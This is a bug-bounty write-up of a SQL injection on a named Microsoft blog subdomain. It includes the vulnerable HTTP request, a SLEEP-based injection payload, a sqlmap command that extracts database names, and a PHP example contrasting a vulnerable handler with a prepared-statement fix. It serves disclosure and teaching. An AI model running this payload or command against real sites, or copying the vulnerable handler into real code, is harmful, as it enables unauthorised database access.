SQL Injection Vulnerability in Microsoft’s DevBlogs [devblogs.microsoft.com]

Zhenwarx
2 min read · Jan 20, 2025


Hello world

In this write-up, I discuss a SQL injection vulnerability discovered on Microsoft’s DevBlogs website ([https://devblogs.microsoft.com](https://devblogs.microsoft.com)). This type of security flaw allows an attacker to manipulate the website’s database by injecting malicious SQL queries. I explain how the vulnerability was identified and the potential risks it poses.

First, if you open https://devblogs.microsoft.com/ and use a browser extension or any other fingerprinting tool, you can see that this subdomain runs the WordPress CMS as its blogging platform.

Then I tried to find something there, as it was an interesting subdomain for me. By exploring the website and analyzing its requests, I found this specific request:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://devblogs.microsoft.com/
Cookie: VALUE
Content-Length: 17894
Accept-Encoding: gzip,deflate,br
User-Agent: NOTROBOT
Host: devblogs.microsoft.com
Connection: Keep-alive

action=load_more_results2&limit=10&offset=10&query=HELLO&search_term=the
```

After some tests, I discovered that the `query` parameter was vulnerable to SQL injection, which I confirmed using this payload: `(SELECT 4008 FROM (SELECT(SLEEP(5)))LDNk)`

I saved the request in a text file and, using this command, was able to extract the database names as a proof of concept (PoC):

```shell
sqlmap -r savedreqsql.txt --dbs --force-ssl -p query
```

The extracted database names were:

```
[*] information_schema
[*] performance_schema
[*] wp_devblogs
```

I continued testing the request and noticed that it was actually vulnerable to error-based SQL injection, which was easier to exploit than the time-based one.
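As an added illustration (not DevBlogs' own code, which is not public), here is a hypothetical WordPress admin-ajax handler for the `load_more_results2` action in the shape the request above suggests, first in the vulnerable form that produces exactly this class of bug and then hardened with `$wpdb->prepare()`; the table, column and nonce names are assumptions.

```php
<?php
// Hypothetical handler (added example, not DevBlogs' code). The action name
// "load_more_results2" and the parameters query/limit/offset come from the request
// in the write-up; table, column and nonce names are assumptions.

// VULNERABLE: the user-supplied "query" value is interpolated straight into SQL,
// so a value like the SLEEP-based payload above becomes part of the statement.
// Error messages leaking from $wpdb->get_results() are what makes the
// error-based variant easier to confirm than the time-based one.
function devblogs_load_more_results_vulnerable() {
    global $wpdb;
    $query  = $_POST['query'];
    $limit  = $_POST['limit'];
    $offset = $_POST['offset'];
    $sql = "SELECT ID, post_title FROM {$wpdb->posts}
            WHERE post_status = 'publish' AND post_title LIKE '%{$query}%'
            LIMIT {$limit} OFFSET {$offset}";
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// HARDENED: nonce check, typed parameters, and $wpdb->prepare() so the database
// receives the search string as data, never as SQL. Integers are cast before use.
function devblogs_load_more_results_hardened() {
    global $wpdb;
    // Hypothetical nonce action; the page would emit it via wp_create_nonce().
    check_ajax_referer( 'devblogs_load_more', 'nonce' );

    $query  = sanitize_text_field( wp_unslash( $_POST['query'] ?? '' ) );
    $limit  = min( max( absint( $_POST['limit'] ?? 10 ), 1 ), 50 ); // bound page size
    $offset = absint( $_POST['offset'] ?? 0 );

    // esc_like() makes % and _ literal; prepare() then binds the whole value.
    $like = '%' . $wpdb->esc_like( $query ) . '%';
    $sql  = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts}
         WHERE post_status = 'publish' AND post_title LIKE %s
         LIMIT %d OFFSET %d",
        $like, $limit, $offset
    );
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// A public "load more" feature is reachable without a session, which is why the
// _nopriv hook exists; both hooks point at the hardened handler.
add_action( 'wp_ajax_load_more_results2',        'devblogs_load_more_results_hardened' );
add_action( 'wp_ajax_nopriv_load_more_results2', 'devblogs_load_more_results_hardened' );
```

The defensive takeaway is that `admin-ajax.php` actions registered with `wp_ajax_nopriv_` are anonymous attack surface, so every parameter they read should go through `$wpdb->prepare()` or a typed cast before it reaches a query.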

After I reported it to the Microsoft team, their response was:

Then:

And finally:

Actually, it was a bit weird for me that a critical issue on a subdomain like devblogs.microsoft.com wasn’t in scope. So, what could be?

Thanks for reading, and stay safe online!

X (Twitter): Https://x.com/zhenwarx
